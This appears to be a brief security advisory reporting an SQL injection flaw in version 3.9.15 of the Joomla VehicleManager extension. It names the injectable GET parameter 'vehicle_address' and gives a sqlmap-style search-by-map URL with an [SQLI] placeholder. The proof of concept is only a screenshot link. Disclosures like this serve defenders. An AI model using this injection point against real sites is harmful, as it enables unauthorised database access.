Joomla VehicleManager 3.9.15 SQL Injection

Joomla VehicleManager extension version 3.9.15 suffers from a remote SQL injection vulnerability.


MD5 | bb63e0e2208ec12bb296390ba31de4c2

################################################
#Title: Joomla VehicleManager 3.9.15 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://ordasoft.com/
#URL:
https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
#Product: 'Joomla VehicleManager 3.9.15'
#Developer: OrdaSoft
#Extension type: Plugin
#Last updated: Dec 06 2017
#Compatibility: 3.X
#Google Dork: N/A
################################################
#
# Description:
# Vehicle Manager Basic is free automotive Joomla component for
car/vehicle management and building car sale and rental websites.
#
# --Method=GET -p [vehicle_address]
#
# -u "
http://127.0.0.1/joomla/index.php/vehiclemanager/search/search-by-map?vehicle_address=a[SQLI]&vehicle_search_range=1000&vehicle_search_latitude=48.3705449&vehicle_search_longitude=10.897789999999986&vehicle_cat=
"
#
# PoC:
# https://prnt.sc/hvi84s
#
#Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

Related Posts